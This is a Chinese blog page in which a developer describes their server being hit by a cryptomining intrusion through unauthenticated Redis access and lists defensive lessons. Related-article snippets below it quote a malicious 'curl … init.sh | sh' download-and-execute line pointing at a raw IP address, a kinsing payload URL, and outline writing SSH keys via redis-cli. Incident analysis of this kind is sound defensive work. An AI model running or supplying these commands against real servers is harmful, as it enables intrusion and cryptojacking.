攻击者利用Redis未授权访问漏洞进行新型入侵挖矿的事件分析

最新推荐文章于 2024-08-11 18:55:22 发布
最新推荐文章于 2024-08-11 18:55:22 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: redis

攻击者利用Redis未授权访问漏洞进行新型入侵挖矿的事件分析
昨天我在博客中分享了自己服务器被攻击的一段病毒脚本——【谁干的】,安全方面不是很专业,只看懂了个大概,对着脚本将那些自动任务一一删除了,禁用了Redis对外开放,及时加了密码才使服务器能正常运转,上次的勒索病毒让我躲过了一劫,没想到这次因为自己的一时疏忽,竟然在第一时间就中招了……看看专业人士的分析吧

攻击者利用Redis未授权访问漏洞进行新型入侵挖矿的事件分析

病毒结构

其实这次除了服务中断了几小时,别的损失到也没有,但还是给我敲响了警钟,作为一个开发人员,也不能忽视安全问题,对于生产或者准生产环境的服务器,教训总结如下
(1)端口能不对外暴露尽量不要暴露
(2)防火墙规则一定要配置号,及时屏蔽异常ip的暴力破解
(3)千万千万不要设置root用户直接登陆服务器,密码强度足够,且不足为外人道也
(4)使用开源组件及时关注版本更新情况,更新补丁

总之,开发也要涉猎其他领域,遇到问题才不会慌了手脚,懂的更多,面对威胁也就能将潜在损失降到最低

轻尘×
关注
专栏目录
redis授权访问漏洞
SatanRiver的博客
08-15 455
一、了解漏洞 1、什么是redisredis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的api。 2.redis 授权访问是什么漏洞redis是默认绑定在0.0.0.0:6379,并且没有开启认证,如果没有采取相关的一些策略,比如添加防火墙规则避免其他非信任来源的ip访问等,将会导致redis服务直接暴露在公网,...
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1342
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
redis 授权访问漏洞和防范
weixin_33851177的博客
11-05 101
通过nmap扫描开放redis 6379端口本机安装redis客户端,能连接远端redis数据库;(redis-cli)本机创建私钥和公钥,ssh-keygen -t rsa 一路回车;会在/root/.ssh/下生成私钥文件id_rsa和公钥id_rsa.pubredis-cli -h 192.168.3.14 链接远程redis数据库[root@hack bin]# ./...
Redis漏洞大全~讲解最全的漏洞利用方法
最新发布
weixin_67832625的博客
08-11 1053
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
redis授权访问致远程植入挖矿脚本
煮酒闲谈
12-19 1755
前言遇到安全事件发生的时候,我们往往会有相应的处理流程与方法,但是作为一个萌新来说,对于安全事件的处理即应急响应还是比较陌生的,于是今天分享这样一篇文章。 安全应从小事做起,从细节做起 本文转载自<我的世界安全观>作者会不定期的更新一些与安全技术相关的干货,欢迎大家关注。1 安全事件描述1.1 开发服务器被勒索主机xx.xx.xx.xx出现异常:cpu高达700%,且登录出现访问外链的异常提醒:
记一次因redis授权访问漏洞被攻击进行挖矿
12-05 907
一、问题描述 redis存储的业务数据被清空,且被注入知的url下载链接: cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。 二、分析 分析参考链接: https://www.freebuf.com/c...
redis授权导致服务器被挖矿分析(20220119)
fr1d4st的博客
01-27 2743
文章目录@[toc]0x00 背景0x01 现象0x02 临时处理0x03 溯源 0x00 背景 20220119收到阿里云报警短信 【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理 。 登录阿里云控制台后发现有多条异常记录 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
Redis授权访问漏洞
周星星的博客
08-22 1542
Redis授权访问漏洞复现以及利用
Redis授权访问漏洞利用及防护措施(非常详细)
7Riven's blog
11-29 1万+
靶机(centos6.6):192.168.109.150 攻击机(kali-linux 2019.3):192.168.109.148 漏洞环境配置部署见:https://blog.csdn.net/qq_41210745/article/details/103305262 1.nmap存活主机扫描 2.发现疑似目标主机,扫描端口服务:找到目标端口6379 3.ka...
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9606
redis授权访问漏洞
恶意程序利用Redis授权访问缺陷入侵系统
当星宿都沉默
08-02 316
一、系统被入侵表现: 系统无法正常使用。 二、登录服务器查看: 系统被挖矿程序入侵,导致CPU占用极高。 三.解决方式: 1.关闭并彻底删除恶意程序 kill掉进程后,不一会儿进程有被启动。怀疑被植入了定时任务 通过crontab -l查看,果然被植入了定时任务,每五分钟获取并执行远程脚本。 最终将定时任务一并删除。 2.修改redis.conf配置文件: port/r...
Redis授权访问漏洞利用总结
cj_Hydra's Blog
06-24 1185
没有设置密码认证(一般为空),可以免密码远程登录redis服务。
linux如何执行rb代码,Redmine git_http_controller.rb任意命令执行漏洞
weixin_32200329的博客
05-13 548
发布日期:2014-12-31更新日期:2015-01-05受影响系统:Redmine Redmine描述:CVE(CAN) ID: CVE-2013-4663Redmine是用Ruby开发的基于web的项目管理软件,是用ROR框架开发的一套跨平台项目管理系统。Redmineredmine_git_hosting插件中,git_http_controller.rb在实现上存在安全漏洞,远程攻击者...
开源Bug管理系统Redmine安装和使用心得
weixin_33724659的博客
08-03 201
        最终忍受不了公司使用论坛+Excel来进行bug反馈和管理工作了,于是花了一个上午时间研究了下bug管理系统。这样一个bug管理系统能够轻松的查看bug新增了哪些,攻克了哪些。当前是谁,要在什么时间解决。不管是qa还是程序都能够轻易的在这个系统上面查看当前要解决和复測的bug。        终于目标锁定为两个开源的项目管理系统,禅道和Redmine,两个都很优秀,而我的...
Web安全:文件上传漏洞基本概念及相关实践
qq_37858047的博客
07-28 570
一、介绍 文件上传漏洞是指,用户上传了一个可执行文件脚本,并通过此脚本获取了执行服务器端命令的能力。文件上传漏洞是指,用户上传了一个可执行文件脚本,并通过此脚本获取了执行服务器端命令的能力。 Uploaded files represent a significant risk to applications. The first step in many attacks is to get...
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
redmine坑 解决后续
tokyohuang123的博客
01-17 735
redmine坑 解决后续 利用redmine的api 用ldap账号推送账户 脚本如下 require 'net/https' require 'uri' require 'json' require 'net/ldap' def get_user api =('http://192.168.0.222:3000/users.json') params ={"key" =>...
redmine全记录(更新)
weixin_33720078的博客
06-13 305
最近一直在使用redmine,准备研究一翻,顾把这些知识集中的记录下来。1、windows下的一键安装http://bitnami.org/stack/redmine建议使用1.3或1.4版本http://blog.csdn.net/jubincn/article/details/67417122、插件一览表以及下载http://www.redmine.org/projects/redmine/w...
Redis授权访问与SSH key利用分析
本文主要探讨了Redis授权访问的安全风险,以及如何利用这种漏洞配合SSH key文件进行恶意活动。Redis是一个高性能的键值存储系统,常用于缓存和数据持久化,但其默认配置可能存在安全隐患。 一、Redis授权访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值